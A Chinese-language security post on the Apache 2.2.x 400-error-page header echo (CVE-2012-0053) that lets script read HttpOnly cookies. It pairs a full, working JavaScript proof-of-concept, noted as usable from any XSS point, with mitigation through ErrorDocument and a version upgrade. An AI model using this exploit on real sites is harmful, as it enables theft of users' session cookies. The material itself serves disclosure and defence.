很多程序以及一些商业或成熟开源的 CMS 文章系统,为了防止 XSS 盗取用户 Cookie,一般都会给 Cookie 加上 HttpOnly 属性,禁止 JS 直接通过 document.cookie 读取,从而降低 XSS 的危害。而 Apache 2.2.x 在 400 错误页中原样回显请求头的这个问题,刚好可以用来绕过 HttpOnly:Cookie 不是从 document.cookie 读出来的,而是从服务器返回的响应正文里读出来的。
用 Chrome 打开目标站点,按 F12 打开开发者工具,切换到 Console,粘贴如下代码并回车:
// http://www.exploit-db.com/exploits/18442/
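// Plant or expire the padding cookies used by the Apache 2.2.x 400-error-page
// cookie leak PoC (exploit-db 18442). The point of the padding is to push the
// request's Cookie header over the server's per-header size limit so the
// server answers with a 400 page that echoes the header back.
//
// good  - falsy: write `count` cookies named xss0..xss<count-1>, each holding
//         `size` bytes of "x" with path=/; truthy: expire those same cookies.
// count - number of padding cookies (default 10, as in the original PoC).
// size  - length of each padding value (default 819). 10 x 819 is a little
//         over 8 KiB, which is meant to exceed the stock request-field limit
//         of an unhardened Apache 2.2 -- confirm against the target's
//         LimitRequestFieldSize before tuning these.
// Side effects only: every cookie string is assigned to document.cookie.
// No return value.
function setCookies(good, count, size) {
  var total = count === undefined ? 10 : count;
  var len = size === undefined ? 819 : size;
  // Array(n + 1).join("x") yields exactly n copies of "x".
  var padding = new Array(len + 1).join("x");

  for (var i = 0; i < total; i++) {
    var cookie;
    if (good) {
      // An expiry 1 ms in the past makes the browser drop the cookie at once.
      var past = new Date(+new Date() - 1).toUTCString();
      cookie = "xss" + i + "=;expires=" + past + "; path=/;";
    } else {
      cookie = "xss" + i + "=" + padding + ";path=/";
    }
    document.cookie = cookie;
  }
}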
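// Fire the probe request and, if the server answers with a 400 page, lift the
// cookie names and values out of it. An unpatched Apache 2.2.x echoes the
// offending request header inside a <pre> block of its 400 page, so a Cookie
// header that is too long comes back in a response body that script can read;
// that is how HttpOnly is sidestepped here.
//
// Fixes relative to the listing on this page: the loop used `cookies.split`
// (the `[i]` index was eaten by forum markup) and threw on the first pair;
// a 400 page without a <pre> block made `match()` return null and the code
// dereferenced it; cookie names kept the leading space of the "; " separator;
// and split("=", 2) truncated values that themselves contain '='.
//
// Side effects: plants the padding cookies via setCookies(), sends a GET to
// "/", expires the padding cookies again, and alert()s the recovered cookies
// as JSON. No return value. Needs setCookies() from this file and the browser
// globals XMLHttpRequest, document and alert.
function makeRequest() {
  setCookies();

  var xhr = new XMLHttpRequest();

  // onreadystatechange handler: parse the echoed Cookie header out of a 400 page.
  function parseCookies() {
    // Only a completed request that came back as 400 carries the echoed header.
    if (xhr.readyState !== 4 || xhr.status !== 400) {
      return;
    }
    var cookieDict = {};
    // Drop newlines so the <pre> block can be matched as a single line.
    var match = xhr.responseText.replace(/\r|\n/g, "").match(/<pre>(.+)<\/pre>/);
    // match() is null when the page has no <pre> block (patched server, custom
    // ErrorDocument); fall through and still clean up the padding cookies.
    if (match) {
      var header = match[1].replace("Cookie: ", "");
      // Strip our own padding cookies, then split what is left on ';'.
      var pairs = header.replace(/xss\d=x+;?/g, "").split(/;/g);
      for (var i = 0; i < pairs.length; i++) {
        // Cookies are separated by "; ", so names carry a leading space unless trimmed.
        var pair = pairs[i].trim();
        if (pair === "") {
          continue;
        }
        // Split on the FIRST '=' only; base64-style values contain '=' too.
        var eq = pair.indexOf("=");
        var name = eq === -1 ? pair : pair.slice(0, eq);
        var value = eq === -1 ? undefined : pair.slice(eq + 1);
        cookieDict[name] = value;
      }
    }
    // Expire the padding cookies again whether or not anything was recovered.
    setCookies(true);
    alert(JSON.stringify(cookieDict));
  }

  xhr.onreadystatechange = parseCookies;
  xhr.open("GET", "/", true);
  xhr.send(null);
}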
// Entry point: run the probe as soon as the snippet is pasted into the console.
makeRequest();
你就能看见华丽丽的 400 错误页面,其中包含了当前站点的 Cookie 信息。注意:这些 Cookie 是服务器在 400 错误页里回显的,所以即使带有 HttpOnly 属性也会被脚本读到;攻击者只需把上述代码放进一个 XSS 点即可利用。
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download
修复方案:
Apache 官方提供 4 种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:
In the event of a problem or error, Apache can be configured to do one of four things:
1. output a simple hardcoded error message —— 输出一条简单的硬编码错误信息
2. output a customized message —— 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error —— 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error —— 转向一个外部 URL
经测试,对于 400 错误只有方法 2 有效:配置后返回包不再包含 Cookie 内容。方法 3、4 对 400 无效,这与 ErrorDocument 文档的说明一致:请求格式错误时 Apache 会立即中止处理并返回内置错误信息,不再做内部转发。
Apache 配置(注意 ErrorDocument 与状态码之间必须有空格,引号内的文字可以任意替换):
ErrorDocument 400 "security test"
当然,更彻底的做法是把 Apache 升级到已修复该问题的版本(2.2.22 及以上,见下方参考链接);ErrorDocument 只是把回显的请求头隐藏掉,属于临时缓解措施,而不是根本修复。
参考:http://httpd.apache.org/security/vulnerabilities_22.html(该页面中对应此问题的条目为 CVE-2012-0053)